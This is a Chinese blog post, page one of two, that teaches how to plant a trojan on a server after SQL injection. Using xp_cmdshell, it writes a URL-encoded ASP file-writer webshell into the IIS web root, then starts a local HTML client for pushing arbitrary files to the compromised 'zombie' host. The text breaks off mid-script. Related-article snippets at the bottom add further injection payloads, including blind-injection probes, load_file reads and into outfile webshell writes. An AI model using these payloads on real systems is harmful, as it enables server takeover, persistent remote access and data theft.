SQL注入与木马上传

最新推荐文章于 2024-08-05 22:16:17 发布
最新推荐文章于 2024-08-05 22:16:17 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 数据库 文章标签: sql javascript 服务器 input asp web
<script type="text/javascript"> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
<script type="text/javascript"> </script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
SQL 注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。1、 SQL 注入的时候,用xp_cmdshell向服务器上写入一个能写文件的asp文件。文件内容:<%SetobjFSO=Server.createObject("Scripting.FileSystemObject")SetobjCountFile=objFSO.createTextFile(request("mypath"),True)objCountFile.Writerequest("mydata")objCountFile.Close%>这个文件可以写成一行<%SetobjFSO=Server.createObject("Scripting.FileSystemObject"):SetobjCountFile=objFSO.createTextFile(request("mypath"),True):objCountFile.Writerequest("mydata"):objCountFile.Close%>将特殊字符进行编码就可以得到%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E 注入(这里假定web目录是C:/Inetpub/wwwroot/):execmaster..xp_cmdshell'echo"%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E">C:/Inetpub/wwwroot/ftp.asp';这样在服务器的web目录下将生成一个ftp.asp文件该文件的代码为<%SetobjFSO=Server.createObject("Scripting.FileSystemObject")SetobjCountFile=objFSO.createTextFile(request("mypath"),True)objCountFile.Writerequest("mydata")objCountFile.Close%>你可以看到,上面代码中预留了两个接口mypath和mydatamypath是下次提交的时候文件的生成路径mydata是文件的内容在本地编写一个客户端文件例:RohuClient.htm代码如下<!DOCTYPEPUBLIC"-//W3C//DTDHTML4.01Transitional//EN"><html><head><metahttp-equiv="Content-Type"content="text/html;charset=gb2312"><title>肉鸡文件生成器--客户端制作:绝对零度:12216796</title><styletype="text/css"><!--TD{FONT-SIZE:9pt;LINE-HEIGHT:150%}BODY{FONT-SIZE:12px;FONT-FAMILY:Verdana,Arial,Helvetica,sans-serif,宋体;SCROLLBAR-FACE-COLOR:#eeeeee;SCROLLBAR-HIGHLIGHT-COLOR:#ffffff;SCROLLBAR-SHADOW-COLOR:#dee3e7;SCROLLBAR-3DLIGHT-COLOR:#d1d7dc;SCROLLBAR-ARROW-COLOR:#006699;SCROLLBAR-TRACK-COLOR:#ededed;SCROLLBAR-DARKSHADOW-COLOR:#98aab1}A:link{FONT-SIZE:9pt;COLOR:#363636;LINE-HEIGHT:18px;TEXT-DECORATION:none}A:visited{FONT-SIZE:9pt;COLOR:#363636;LINE-HEIGHT:18px;TEXT-DECORATION:none}A:hover{COLOR:#cc0000;LINE-HEIGHT:18px;TEXT-DECORATION:underline}input,select,TEXTAREA{font-family:"tahoma","arial","helvetica","sans-serif","宋体";background-color:#f9f9f9;font-size:9pt;border:1px#d2d2d2dobble;line-height:120%;}--></style></head><scriptlanguage="javascript"type="text/javascript">functionchk(theform){if(theform.ftpUrl.value==''){alert('请输入递交的地址!');theform.ftpUrl.focus();returnfalse;}if(theform.MyPath.value==''){alert('请输入生成文件的位置!');theform.MyPath.focus();returnfalse;}if(theform.MyData.value==''){alert('请输入生成文件的内容!');theform.MyData.focus();returnfalse;}theform.共2页  第1页 
<script type="text/javascript"> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
<script type="text/javascript"> </script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
zgqtxwd
关注
专栏目录
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9360
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
网络安全---文件上传sql注入判断
bffanfan的博客
01-07 453
文件上传 1.文件 动态文件:具有交互性的文件 格式:.py .php 等与代码相关的文件,与后台进行交互 静态文件:不具有交互性的文件 格式:.jpg .txt .mp3(二进制流通过播放器所呈现的效果).html(将二进制流发送至用户端,浏览器对页面信息进行解析) 当静态文件当成动态文件同样会被执行,某些漏洞也会导致静态文件被执行 漏洞—动态文件:上传、找到路径调用 ​ —静态文件:上传、找到路径、利用可执行的漏洞进行调用 2.文件上传漏洞 概述 我们在上网时经常会使用文件上传的功能,比如上传一个头像图
SQL注入ASP木马上传的又一思路.txt
07-06
·中华隐者
SQL注入ASP木马上传
12-31 927
SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。文件内容:Set objFSO = Server.CreateObject("scripting.FileSystemObject")Set objCountFile=objFSO.CreateTextFile(request(
SQL注入webshell上传
最新发布
aihua002的博客
08-05 353
1.高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限,所以该选项为可以=‘“”/=一个路径,不能为NULL,secure_file_priv=“” 代表文件读写没有限制,secure_file_priv=一个路径,代表只能对该路径下文件进行读写,而secure_file_priv=NULL 代表不能对文件进行读写。首先webshell上传就是利用MySQL的文件读写注入而实现,要想上传webshell就得了解文件读写注入的原理。
SQL注入上传一句话木马
buffedon的博客
05-31 9838
利用sql注入上传一句话木马导读1. sql注入的危害2. 文件写入2.1 webshell和一句话木马webshell(大马)一句话木马木马文件的危害2.2 文件写入的前提条件2.3 写入函数2.4 怎么找网站根目录(绝对路径)2.5 只能与回显注入结合2.6 日志写文件2.7 文件读取前提条件读取函数2.8 针对文件写入的防护 导读 本文主要介绍了利用sql漏洞上传文件的一些知识。在利用sql注入漏洞上传文件的时候我们需要知道 被上传的网页 在web服务器的路径 上传文件要获取哪些权限,也就是有哪些前
sql上传木马
weixin_30586085的博客
03-02 349
第十周笔记—SQLmap和sql注入上传木马 目录 第十周笔记—SQLmap和sql注入上传木马 SQL注入 上传木马 SQLmap 六大模块 命令 参数 三种请求方式 取得系统shell sqlmap高级注入 SQL注入 上传木马 前提: 要知道网站的绝对路径 具有写入权限 select...
SQL注入-概述-ppt.pptx
10-27
3. **上传脚本木马**:在服务器上部署恶意脚本,持续控制。 4. **获得Webshell**:通过Webshell,攻击者可远程控制服务器。 5. **内网渗透**:进一步侵入内部网络,攻击其他系统或设备。 为了防止SQL注入,开发者应...
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1569
SQL注入上传一句话木马
利用SQL注入上传木马webshell
D1stiny的博客
05-25 1879
学到了一种操作,说实话,我从来没想过还能这样 正常情况下,为了管理方便,许多管理员都会开放MySQL数据库的secure_file_priv,这时就可以导入或者导出数据 当我如图输入时,就会在D盘创建一个名为123456.php,内容为<?php phpinfo();?>的文件 我们可以利用这一点运用到SQL注入中,从拿下数据库到拿下目标的服务器 比如我们在使用联合查询注入,正常是这样的语句http://xxx?id=-1 union select 1,'你想知道的字段的内容或查询语句',
sql 上传文件 下载文件 一句话木马+菜刀 sqlmap
qq_41071646的博客
02-21 3998
这里说的内容可能比较多  但是都需要  高的权限 能够 创建删除 文件~~~~   然后 先说一下 下载文件吧     我们构造的链接是 http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=0' union select 1,load_file("D:\\flag.txt"),3 --+ 然后  我们的内容 如下  ...
SQL注入——文件上传
heyingcheng的博客
03-11 2464
3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径。2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限。在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限。其实我们最终的目的是往目标靶场上上传一句话木马,或者是自己想上传的php文件。当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。
sql注入之into outfile语句写入一句话木马_sql的into outfile
code8889的博客
04-15 1159
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
文件上传漏洞
zhoutong2323的博客
04-06 878
Webshell是指一种利用Web漏洞获取远程操作权限的工具或脚本,Webshell通常隐藏在Web应用程序的后台目录中,攻击者通过利用一些已知的或未知的漏洞,将Webshell上传服务器中。一旦成功部署Webshell,攻击者可以通过浏览器或专门的管理工具对服务器进行远程操控,并执行任意操作。
真实渗透改编--综合渗透 sql注入写马+文件上传+udf提权 安鸾靶场SQL注入学习
AAAAAAAAAAAA66的博客
02-16 4980
从去年12月末到现在2月中,也算是把这个靶场的大多数题目刷了一遍,自己也能算的上一个初学者把,本文具体的教程在b站上有(建立靶场的师傅),而本文记录自己的解题和思考过程。如果之前没有接触到这些知识点的同学,可能会感觉到比较吃力,这是正常的。 哈兹本得的个人空间_哔哩哔哩_Bilibili 题目URL http://106.15.50.112:8023/ 目录 解题过程 sql注入写马 ​ 提权 准备udf文件(提权文件) 实施 解题过程 sql注入写马 寻找注入点 寻找网站真实.
Mysql注入上传木马提权
Jim的博客
09-13 1164
上传暗月大马
SQL注入策略与防御技巧揭秘
- **Web目录探测**:如果无法执行系统命令,可能尝试上传ASP木马以获取更高的权限。 - **管理员权限获取**:最终目标可能是获取Web服务器的管理权限。 7. **防范措施** - **参数验证**:对用户输入进行严格的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值